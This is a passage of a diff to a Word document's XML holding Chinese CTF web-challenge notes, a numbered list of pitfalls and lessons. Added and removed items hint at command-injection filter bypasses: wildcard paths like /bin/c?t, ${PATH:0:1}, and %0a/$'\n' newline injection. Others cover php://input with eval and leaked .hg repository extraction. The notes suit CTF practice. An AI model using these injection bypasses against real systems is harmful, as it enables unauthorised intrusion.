+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>17</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>坑：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>exec</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 空白 = 输出走了 stderr</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">教训：加 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>2&gt;&amp;1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 看错误</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>18</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>坑：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>c?t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 命令不存在</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">教训：通配符只在"所在目录"匹配，必须写 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>/bin/c?t</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>19</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>坑：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>cat flag_is_here/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 空白</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
         <w:t>教训：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>二进制文件必须 `-o`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>cat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 的是目录 → </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Is a directory</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15905,10 +16240,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>9</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>20</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15920,22 +16254,22 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">坑：只看 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>NODES</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 漏掉被删文件</w:t>
+        <w:t xml:space="preserve">坑：curl 吃掉 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>${PATH:0:1}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 的花括号</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15947,30 +16281,15 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">教训：要看 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>PRISTINE</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 的 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>refcount = 0</w:t>
+        <w:t xml:space="preserve">教训：URL globbing！加 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>-g</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15980,10 +16299,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>10</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>21</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16003,14 +16321,29 @@
           <w:color w:val="C7254E"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>.hg/store/data/flag_xxx.txt.i</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> → 404</w:t>
+        <w:t>--data-urlencode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 把 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>%0a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 再编码</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16022,15 +16355,111 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
+        <w:t xml:space="preserve">教训：用 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>$'\n'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 发真换行</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>22</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">坑：表单框里填 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>%0a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 无效</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
         <w:t>教训：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`_` 要转义成 `__`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>&lt;input&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 单行 + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 会被编码成 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>%25</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16040,10 +16469,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>11</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>23</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16055,15 +16483,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">坑：revlog 解压报 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>incomplete stream</w:t>
+        <w:t>坑：页面看不到 flag 但 Response 有</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16075,269 +16495,6 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">教训：首字节 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>'u'</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = 原文，不是 zlib</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>12</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>坑：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>rip-hg.pl</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 报 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>cannot find hg</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">教训：要先 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>apt install mercurial</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>13</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>坑：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>ghproxy.net</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 502</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">教训：换 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>gh-proxy.com</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>14</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>坑：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>HackBar 里 body 被 URL 编码</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">教训：看到 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>%3C%3Fphp...</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = 编码了；</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>php://input</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 不解码</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>15</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>坑：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`-G` 把 body 变成 URL 参数</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
         <w:t>教训：</w:t>
       </w:r>
       <w:r>
@@ -16346,568 +16503,14 @@
           <w:color w:val="C7254E"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>php://input</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 就没 body 了</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>16</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>坑：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`eval` 里漏分号</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> → 空白</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">教训：PHP 语句要 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">（除非后面跟 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>?&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>）</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>17</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>坑：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
